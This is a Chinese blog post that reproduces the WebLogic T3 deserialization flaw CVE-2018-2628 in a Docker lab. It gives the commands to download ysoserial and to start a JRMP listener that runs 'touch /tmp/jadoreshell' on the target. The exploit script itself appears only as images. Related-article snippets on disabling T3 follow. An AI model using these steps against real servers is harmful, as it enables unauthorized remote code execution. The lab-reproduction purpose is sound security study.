weblogic 关闭t3协议_【漏洞复现】Weblogic反序列化漏洞(CVE20182628)

最新推荐文章于 2024-01-05 16:45:55 发布
最新推荐文章于 2024-01-05 16:45:55 发布
阅读量1.1k 收藏 1
点赞数
文章标签: weblogic 关闭t3协议 weblogic 控制台端口 weblogic创建域后启动不了 weblogic反序列化 weblogic反序列化工具 weblogic控制台默认密码

aa059484c6fcafe2c8902b13342a0ad9.png

131f5a7fb08664352d769a41466f124d.gif

漏洞描述

Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机。T3协议在开放WebLogic控制台端口的应用上默认开启。攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击。

131f5a7fb08664352d769a41466f124d.gif

影响版本

  • Oracle Weblogic Server10.3.6.0.0

  • Oracle Weblogic Server12.1.3.0.0

  • Oracle Weblogic Server12.2.1.2.0

  • Oracle Weblogic Server12.2.1.3.0

131f5a7fb08664352d769a41466f124d.gif

复现步骤

1.启动漏洞环境

命令:

docker-compose up -d
54046dc59452a18c6ac82e360c601966.png

2.下载反序列化工具

命令:

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
215a4bcb3f3724dad71868690740437f.png

3.启动JRMP Server,利用监听在连接成功后靶机上创建jadoreshell

命令:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar  ysoserial.exploit.JRMPListener 8889 Jdk7u21 "touch /tmp/jadoreshell"

d87ef8cf12f3ec97f42821066b6f8e75.png

4.使用ysoserial-0.1-cve-2018-2628-all.jar工具生成一个payload字符串,因为要实现Weblogic远程调用攻击机主机上的方法。就需要知道远程方法所在的主机地址和端口号。所以在上一步要记录攻击主机的信息。

134aa98aba9316b9b92b09fbf1773f71.png

5.替换脚本里的payload以及目标IP地址

a2a9b171121260cebb35051b2ede754f.png 8850d1c7c68fcb4c522190f5c793f22b.png

6.执行python脚本

5b6ea20bfd4e83285ce33ca9ca09d67a.png 88ef87bdb06a9791ba97f4d78b25ce5a.png

7.查看是否写入文本文件

命令:

dockers  ps
f36c4aa1fcd300295a16afd7b5ce95f8.png

命令:

docker exec -ti cve-2018-2628_weblogic_1  /bin/bash

命令:

ls -al /tmp

96994110bc948a22a84b52e78cfcd45c.png

文件写入成功。

131f5a7fb08664352d769a41466f124d.gif

产品解决与支持

华云安灵洞®威胁与漏洞管理平台(Ai.Vul)已经支持一键检测该漏洞。

4b6eea863ec9cb3d9ccfd87ff583ab93.png

a74009e108da7be91ae6d1e58a168122.png

8b4f59a215dccb72eae2a8d5a26e0fef.png

weixin_39866774
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
weblogic禁用t3协议_紧急预警 | 关于 Weblogic 远程代码执行漏洞
weixin_39605521的博客
12-13 2040
NIS研究院 关注SNISA,共享信安事。——下载安全相关资料,点击NIS文库。关于 Weblogic 远程代码执行漏洞紧急预警 一、安全预警Oracle 发布 2020 年 1 月关键补丁更新(Critical Patch U pdate,简称 CPU),此次更新修复了 333 个危害程度不同的安 全漏洞。其中 196 个漏洞可被远程未经身份认证的攻击者利用。此次更新涉及 Or...
weblogic t3协议配置_Weblogic T3、IIOP协议批量禁用
weixin_39598308的博客
12-12 8796
近期各地各行业护网运动开展如火如荼,各系统、中间件、数据库、开源软件层面漏洞层出不穷,另相关的维护专业这苦不堪言。本文要讲的就是与weblogic中间件近期不断被曝出的T3协议、IIOP协议0day漏洞有关。在护网期间,官方补丁又未更新的情况下,能做的可能就是通过及时的禁用相关的协议,以达到漏洞修复的目的,但是通常任务紧、时间短、实例数量又众多的情况下,我们如何快速的做到对实例进行批量的...
weblogic 关闭t3协议_漏洞通报|Weblogic曝出远程代码执行漏洞CVE202014645
weixin_39840635的博客
12-13 1329
点击上方“蓝字”关注我们吧!近日,某网络安全公司发现weblogic历史漏洞补丁修复不全面,存在绕过漏洞。利用该漏洞,攻击者可以实现远程代码执行,进而完全控制服务器。目前,该漏洞编号为CVE-2020-14645,cvss评分为9.8,为高风险漏洞,由于漏洞利用难度低,风险较高,请及时进行修复。受影响范围受影响版本:Oracle WebLogic Server 10.3.6.0.0Ora...
安全加固之weblogic屏蔽T3协议
最新发布
有莘不破的博客
01-05 1697
介绍weblogic t3封阻策略一例
第48篇:Weblogic最新漏洞修复方法(禁用T3+IIOP协议
热门推荐
ABC_123的博客
01-27 12万+
Part1 前言大家好,我是ABC_123。春节前weblogic爆出了一个新的漏洞CVE-2023-21839,据说有攻击队曾用这个在野0day打穿了某银行目标。通过官方的漏洞描述来看,应该还是借助jndi来实现反序列化漏洞利用,所以此漏洞成功条件是目标一定要出网,而且T3或IIOP协议开放。与T3协议或IIOP协议相关的weblogic的0day漏洞近几年还会不断地公布出来,要想彻底解决这...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
2018最新weblogic反序列化漏洞补丁包
05-22
在p27395085_1036_Generic补丁的基础上再打上27453773_1036_Gener,解决CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2018-2628
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的反序列化漏洞。 CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
weblogic 反序列化漏洞补丁
07-05
WebLogic是Oracle公司的一...总之,WebLogic反序列化漏洞CVE-2018-2628是一个严重威胁,需要及时通过安装补丁和加强安全管理来消除风险。对于企业而言,了解和掌握这类漏洞及其修复方法是保护信息系统安全的重要一环。
CVE-2018-2628漏洞复现
锋刃科技的博客
06-07 4832
1. 漏洞简介 Weblogic Server中的RMI 通信使用T3协议Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端口的应用上默认开启. 攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞weblogic组件的远程代码执行攻击. 2. 影响
weblogic t3协议配置_【第15周】通过t3协议识别Weblogic版本
weixin_39801158的博客
12-06 1449
识别Weblogic版本有什么用呢?1. 好判断是否在漏洞版本范围2. 方便构造POC/EXP,(相同漏洞,可能不同版本对应不同POC/EXP,比如CVE-2019-2725)0x01以前的方法以前的方法是访问控制台登录页面,页面底部便有版本号。这里注意404页面的10.4.5并不是版本号!http://*.*.*.*:7001/console/login/LoginForm.jsp...
linux关闭T3协议,Linux 性能优化排查工具
weixin_31980019的博客
05-15 228
下图1为 Linux 性能优化排查工具的总结 图1诊断 CPU 工具查看 CPU 核数总核数 = 物理CPU个数 X 每颗物理CPU的核数总逻辑CPU数 = 物理CPU个数 X 每颗物理CPU的核数 X 超线程数查看物理CPU个数cat /proc/cpuinfo| grep "physical id"| sort| uniq| wc -l查看每个物理CPU中core的个数(即核数)cat /pr...
linux关闭T3协议,Linux中禁止Ctrl-Alt-Delete(转)
weixin_42610671的博客
05-15 269
Linux中禁止Ctrl-Alt-Delete(转)[@more@]默认情况,Linux系统用/etc/inittab文件来控制系统对在系统终端前同时按下[CTRL]-[ALT]-[DELETE]组合键时是reboot还是shutdown。如果你愿意的话,你可以完全禁止这个功能。只要在这个文件中的:ca::ctrlaltdel:/sbin/shutdown -t3 -r now前面加上一个注释符“...
关于weblogict3协议
TT123456XY的博客
06-25 1万+
问题描述:分行自使用BBIP以来,一直都是通过打一个tar都测试环境投产部署来进行测试,流程极其繁琐,光重启应用就得5分钟,现致力于解决此问题,通过在本地编写单元测试进行调试,但行内系统开发不像普通的应用开发本地随便Run,它涉及到一个服务调用问题,总行有很多已经投产并且在使用的公共服务,所以本地启动必须要能连上测试环境的weblogic,调用BBIP平台,需要放开下面这个标签。 这是在本地...
Weblogic反序列化漏洞(CVE-2018-2628),T3协议白名单
leidijava的专栏
10-29 6804
 2018年4月18日凌晨,Oracle官方发布了4月份的关键补丁更新,其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),通过该漏洞,攻击者可以在未授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以获取目标服务器的权限。   受影响版本范围: Oracle WebLogic Server 10.3.6.0 Oracle WebLogic Se...
weblogic t3协议配置_【漏洞预警】WebLogic高危漏洞预警(CVE-2019-2891、CVE-2019-2890)...
weixin_39636691的博客
12-12 174
文章来源:阿里云2019年10月16日,阿里云应急响应中心监测到Oracle官方发布安全公告,披露WebLogic服务器存在多个高危漏洞,包括反序列化等。黑客利用漏洞可能可以远程获取WebLogic服务器权限,风险较大。漏洞描述CVE-2019-2891中,未经授权的攻击者可以通过精心构造的HTTP请求向Console组件发起请求,从而接管WebLogic服务器。CVE-2019-2890中,未经...
weblogic t3协议报错
心寒的博客
01-11 1363
Unable to connect to 't3://10.10.0.110:7011': Bootstrap to: sfile.test.com/t3://10.10.0.110:7011' over: 't3' got an error or timed out
针对需要使用T3协议Weblogic2628漏洞解决方案
weixin_30670151的博客
06-05 416
针对需要使用T3协议Weblogic2628漏洞解决方案 前几天用户的服务器中检查到了Weblogic2628l漏洞,并且打过Oracle官方补丁后还是能检测到。 针对此问题,去网上查找了一些资料。做了一些总结和测试,一共有四种解决此漏洞的方法: 1、禁止使用WeblogicT3协议。(客户需要使用此协议,不可取); 2、升级Oracle官方4月份补丁。(经过测试,打过补丁后,此漏洞依...
Weblogic IIOP反序列化漏洞(CVE-2020-2551)
07-28
关于Weblogic IIOP反序列化漏洞(CVE-2020-2551),以下是一些相关信息: CVE-2020-2551是Weblogic Server的一个严重漏洞,该漏洞允许攻击者通过发送特制的T3协议请求来执行任意代码。这个漏洞属于Java反序列化漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值